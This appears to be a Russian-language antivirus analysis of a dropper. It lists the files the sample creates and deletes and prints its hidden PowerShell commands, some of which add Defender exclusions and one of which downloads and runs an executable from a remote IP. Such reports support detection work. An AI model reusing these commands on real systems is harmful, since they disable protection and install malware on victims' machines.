Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command Add-MpPreference -ExclusionExtension ".exe"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command Add-MpPreference -ExclusionExtension ".mp4"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command Add-MpPreference -ExclusionPath "$env:USERPROFILE\AppData" -ExclusionProcess "Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\giorgia_.exe
- %TEMP%\meloni_03.png
- %TEMP%\7zs9ad8.tmp\my.bat
- %TEMP%\7zs9ad8.tmp\bat2exe.exe
- %TEMP%\7zs9ad8.tmp\telegram.exe
Удаляет следующие файлы
- %TEMP%\7zs9ad8.tmp\bat2exe.exe
- %TEMP%\7zs9ad8.tmp\my.bat
- %TEMP%\7zs9ad8.tmp\telegram.exe
Другое
Создает и запускает на исполнение
- '%TEMP%\giorgia_.exe'
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7zS9AD8.tmp\my.bat" "
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ep bypass iwr -uri http://19#.#68.112.80/telegram.exe -o C:\Users\Public\Downloads\output.exe"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w hidden C:\Users\Public\Downloads\output.exe"
